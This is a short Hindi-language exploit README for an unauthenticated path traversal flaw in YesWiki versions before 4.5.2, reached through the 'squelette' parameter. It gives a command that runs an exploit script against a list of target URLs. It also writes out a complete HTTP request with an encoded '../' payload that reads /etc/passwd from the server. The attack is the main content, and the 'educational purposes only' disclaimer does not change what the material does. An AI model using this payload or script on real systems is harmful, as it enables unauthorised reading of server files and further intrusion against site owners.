
यसविकी PHP में लिखी गई एक विकी प्रणाली है। squelette पैरामीटर पाथ ट्रैवर्सल हमलों के प्रति संवेदनशील है, जो सर्वर पर मनमानी फ़ाइलों तक पढ़ने की पहुंच सक्षम बनाता है।
यह YesWiki के 4.5.2 से पहले के संस्करणों को लक्षित करने वाला एक बिना प्रमाणीकरण वाला पाथ ट्रैवर्सल एक्सप्लॉइट है। यह भेद्यता squelette पैरामीटर में मौजूद है, जो सर्वर से मनमानी फाइलों को पढ़ने की अनुमति देती है।
python3 exploit.py -l urls.txt

यहाँ Burp का उपयोग करके मैन्युअल रूप से एक्सप्लॉइट करने का दूसरा तरीका है:
GET /?UrkCEO/edit&theme=margot&squelette=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd&style=margot.css HTTP/1.1
Host: target.com
Sec-Ch-Ua: "Chromium";v="133", "Not(A:Brand";v="99"
Sec-Ch-Ua-Mobile: ?0
Sec-Ch-Ua-Platform: "Windows"
Accept-Language: en-US,en;q=0.9
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/133.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Sec-Fetch-Site: none
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Accept-Encoding: gzip, deflate, br
Priority: u=0, i
Connection: keep-alive

अस्वीकरण: यह केवल शैक्षिक उद्देश्यों के लिए है।